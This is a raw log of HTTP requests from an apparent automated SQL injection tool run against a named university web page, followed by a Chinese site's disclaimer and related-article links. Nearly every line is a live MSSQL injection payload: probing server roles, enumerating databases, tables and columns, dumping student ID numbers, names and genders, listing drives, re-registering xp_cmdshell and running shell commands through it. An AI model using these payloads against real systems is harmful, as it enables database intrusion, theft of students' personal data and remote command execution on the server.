GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@servername%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar
(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x73006500740075007000610064006d0069006e00)%20as%
20nvarchar(1))%2bchar(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x73006500630075007200690074007900610064006d0069006e00)%
20as%20nvarchar(1))%2bchar(124)=1%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_srvrolemember(0x620075006c006b00610064006d0069006e00)%20as%20nvarchar
(1))%2bchar(124)=1%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%20from]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%203%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20foofoofoo(name%20nvarchar(255),description%20nvarchar(4000));--%
20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%2bcast]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast
([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%
201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..
[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%201%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..
[sysobjects]%20where%20name=0x730074007500640065006e007400)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(10))%2bchar(94)%20from%20[main]..
[syscolumns]%20where%20id=869578136)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..
[student]%20where%201=1)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET %20as%20nvarchar(4000)),char]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20isnull(cast([%D1%A7%BA%C5]%20as%20nvarchar(4000)),char
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20foofoofoo%20(a%20image);--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@s%20varchar(4000)%20set%20@s=cast
(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c
293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554
c4c204944454e544954592028312c31293b%20as%20varchar(4000));exec(@s)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;insert%20foofoofoo%20exec%20master.dbo.xp_availablemedia;--%20and%201=1
GET %20as%20nvarchar(4000))%2bchar(94)%2bcast]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%2bcast
([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET %20[int]%20identity%20]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
3E0--%20and%201=1
GET ([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1]http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;create%20table%20[foofoofoo]([resulttxt]%20nvarchar(4000)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;exec%20master.dbo.sp_addextendedproc%
200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%
20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%
201=1
GET http://xgzx.w
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- SQL注入自动扫描工具中的语句
- 智能SQL优化工具--SQL Optimizer for SQL Server(帮助提升数据库应用程序性能,最大程度地自动优化你的SQL语句 )
- Whitewidow:SQL 漏洞自动扫描工具
- shawl.qiu c# .net 自动生成 OleDb 数据操作语句小工具 Producing OleDbSql 1.1
- 自动生成MOSS Query的SQL语句的工具
- SQLiScanner:又一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具
- codeTool代码自动生成工具(参数类sql数据增删改查语句,实体类,接口代码)
- 智能SQL优化工具--SQL Optimizer for SQL Server(帮助提升数据库应用程序性能,最大程度地自动优化你的SQL语句 )
- 遍历当前目录下的所有子目录例子(自动生成SQl语句工具)
- MyEclipse中 将字符串回车自动换行的配置(自己最常用的就是解决在pl/sql工具下美化好的sql语句放入字符串中)
- sql工具:一条sql语句,查询sql server某个指定表的所有列及其属性
- SQL注入测试工具:Pangolin(穿山甲)
- 利用"SQL"语句自动生成序号的两种方式
- DbVisualizer工具sql语句中存在中文乱码的问题
- SQL语句图表生成工具ChartSQL
- Oracle自动生成数据字典的SQL语句
- 自动生成INSERT语句的SQL存储过程
- SQL 对于有N多字段的表,踢出不需要的字段,自动频出剩余字段的SQL语句
- Mysql C API 使用(二)简单的sql语句执行&dbvisualizer设置自动提示
- Spring自动扫描注入